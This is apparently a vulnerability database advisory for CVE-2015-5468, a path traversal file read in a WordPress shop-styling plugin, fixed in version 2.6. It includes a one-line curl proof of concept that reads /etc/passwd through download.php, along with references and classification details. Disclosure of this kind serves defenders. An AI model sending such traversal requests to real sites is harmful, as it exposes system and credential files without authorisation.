WP e-Commerce Shop Styling <= 2.5 – Local File Inclusion | CVE 2015-5468

Description

The code in ./wp-ecommerce-shop-styling/includes/download.php does not sanitise user input to prevent sensitive system files from being downloaded.

You'll have to rename the download file via mv -- -..-..-..-..-..-..-..-..-etc-passwd passwd as the filename is set to the download filename with path.

Proof of Concept

$ curl http://www.example.com/wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php?filename=../../../../../../../../../etc/passwd

Affects Plugins

wp-ecommerce-shop-styling

Fixed in 2.6

References

CVE

CVE-2015-5468

URL

https://packetstormsecurity.com/files/#132594/

URL

https://plugins.trac.wordpress.org/changeset/1193456/wp-ecommerce-shop-styling

URL

https://github.com/espreto/wpsploit/blob/master/modules/auxiliary/scanner/http/wp_ecommerce_shop_styling_file_read.rb

Classification

Type

LFI

OWASP top 10

A1: Injection

CWE

CWE-22

CVSS

7.5 (high)

Miscellaneous

Submitter

Larry W. Cashdollar

Submitter twitter

_larry0

Verified

WPVDB ID

8b9436d4-3950-40fc-8220-4ae8f0e77f9a

Timeline

Publicly Published

2015-07-05 (about 10 years ago)

Added

2015-07-06 (about 10 years ago)

Last Updated

2020-09-22 (about 5 years ago)

Other

Published

Title

Published

2023-02-22

Title

Custom Content Shortcode <= 4.0.2 - Contributor+ LFI

Published

2016-03-03

Title

epic Theme - Arbitrary File Download

Published

2024-10-21

Title

3D Work In Progress <= 1.0.3 - Authenticated (Subscriber+) Arbitrary File Deletion

Published

2023-11-27

Title

so-widgets-bundle < 1.51.0 - Admin+ Local File Inclusion

Published

2025-03-27

Title

JS Help Desk < 2.9.2 - Unauthenticated Arbitrary File Download